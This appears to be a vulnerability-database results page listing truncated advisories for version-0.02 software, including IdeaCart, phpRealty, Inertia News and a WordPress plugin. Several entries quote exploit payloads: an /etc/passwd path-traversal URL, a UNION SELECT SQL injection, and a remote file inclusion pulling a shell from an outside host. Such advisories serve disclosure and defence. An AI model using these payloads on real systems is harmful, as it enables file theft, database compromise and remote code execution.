EUVD-2004-1295

Malware in sbrugna...

PT-2025-34993

Name of the Vulnerable Software and Affected Versions: Google XML News Sitemap plugin versions not specified Description: The Google XML News Sitemap plugin contains a Cross-Site Request Forgery CSRF vulnerability that also allows Stored Cross-Site Scripting XSS. Recommendations: At the moment,...

WordPress Google XML News Sitemap plugin plugin <= 0.02 - Cross Site Request Forgery (CSRF) to Stored XSS vulnerability

Cross Site Request Forgery CSRF to Stored XSS vulnerability discovered by Nguyen Xuan Chien Patchstack Alliance in WordPress Plugin Google XML News Sitemap plugin versions = 0.02...

Authen::DigestMD5 安全漏洞

Authen::DigestMD5 is a module in the Perl language from the Perl community. A security vulnerability exists in Authen::DigestMD5 versions 0.01 through 0.02, which stems from insecure cnonce generation...

Design/Logic Flaw

An issue in rymcu forest v.0.02 allows a remote attacker to obtain sensitive information via manipulation of the HTTP body URL in the com.rymcu.forest.web.api.common.UploadController file...

forest Security breach

forest is a modern knowledge community backend project implemented using SpringBoot + Shiro + MyBatis + JWT + Redis. A security vulnerability exists in rymcu forest v.0.02 that allows remote attackers to obtain sensitive information by manipulating the HTTP URL in the...

ideacart 0.02 (lfi/sql) Multiple Vulnerabilities

No description provided by source. IdeaCart 0.02 LFI/SQL Multiple Remote Vulnerabilities Author: nuclear LFI: http://127.0.0.1/index.php?page=../../../../../../../../../etc/passwd%00 SQL: http://127.0.0.1/secure/index.php?cID=1%20union%20select%201,2,3,4,5,6,@@version,8%23 notes: get ur sql resul...

CVE-2009-5088

SQL injection vulnerability in secure/index.php in IdeaCart 0.02 allows remote attackers to execute arbitrary SQL commands via the cID parameter...

Sql injection

SQL injection vulnerability in secure/index.php in IdeaCart 0.02 allows remote attackers to execute arbitrary SQL commands via the cID parameter...

CVE-2009-5088

CVE-2009-5088 describes an SQL injection in IdeaCart 0.02, specifically in secure/index.php where the cID parameter allows remote attackers to execute arbitrary SQL commands. The vulnerability arises from improper input handling in that script, enabling data disclosure or modification depending o...

IdeaCart 0.02 (LFI/SQL) Multiple Remote Vulnerabilities

No description provided by source. IdeaCart 0.02 LFI/SQL Multiple Remote Vulnerabilities Author: nuclear LFI: http://127.0.0.1/index.php?page=../../../../../../../../../etc/passwd%00 SQL: http://127.0.0.1/secure/index.php?cID=1%20union%20select%201,2,3,4,5,6,@@version,8%23 notes: get ur sql resul...

ideacart 0.02 - Local File Inclusion / SQL Injection

IdeaCart 0.02 LFI/SQL Multiple Remote Vulnerabilities Author: nuclear LFI: http://127.0.0.1/index.php?page=../../../../../../../../../etc/passwd%00 SQL: http://127.0.0.1/secure/index.php?cID=1%20union%20select%201,2,3,4,5,6,@@version,8%23 notes: get ur sql result at: YOUR ORDER DETAILS 5.0.67 @ b...

IdeaCart 0.02 LFI / SQL Injection

IdeaCart 0.02 LFI/SQL Multiple Remote Vulnerabilities Author: nuclear LFI: http://127.0.0.1/index.php?page=../../../../../../../../../etc/passwd%00 SQL: http://127.0.0.1/secure/index.php?cID=1%20union%20select%201,2,3,4,5,6,@@version,8%23 notes: get ur sql result at: YOUR ORDER DETAILS 5.0.67 @ b...

CVE-2007-4834

Multiple PHP remote file inclusion vulnerabilities in phpRealty 0.02 allow remote attackers to execute arbitrary PHP code via a URL in the MGR parameter to 1 index.php, 2 pins.php, and 3 uins.php in manager/admin/...

phpRealty 0.02 - MGR Multiple Remote File Inclusions

phpRealty 0.02 - MGR Multiple Remote File Inclusions |-------------------------------------------------------------------------------| | | | phpRealty 0.02 MGR Remote File include | | | | Script : phpRealty | | Version : 0.02 | | Authord : QTRinux | | Contact : Qataro at hotmail dot com | | Vendo...

phpreality-rfi.txt

|-------------------------------------------------------------------------------| | | | phpRealty 0.02 MGR Remote File include | | | | Script : phpRealty | | Version : 0.02 | | Authord : QTRinux | | Contact : Qataro at hotmail dot com | | Vendor : http://phprealty.budissy.com/phprealty/v0.02/ | |...

phpRealty 0.02 - &#039;MGR&#039; Multiple Remote File Inclusions

|-------------------------------------------------------------------------------| | | | phpRealty 0.02 MGR Remote File include | | | | Script : phpRealty | | Version : 0.02 | | Authord : QTRinux | | Contact : Qataro at hotmail dot com | | Vendor : http://phprealty.budissy.com/phprealty/v0.02/ | |...

inertia-rfi.txt

Version : 0.02 beta Error : require "$inewspath/inertiasqlclass.php"; Exploit : http://www.victim.com/inertianewsmain.php?inewspath=http://www.site.com/shell.txt Eno7.Org - Crazy-King.ORg Thanks : Apaci & Erne & Eno7 & Tamturk & UyussMan & Ayyıldız Tim...

Inertia News Remote File &#304;nclude

Version : 0.02 beta Error : require "$inewspath/inertiasqlclass.php"; Exploit : http://www.victim.com/inertianewsmain.php?inewspath=http://www.site.com/shell.txt Eno7.Org - Crazy-King.ORg Thanks : Apaci & Erne & Eno7 & Tamturk & UyussMan & Ayyldz Tim...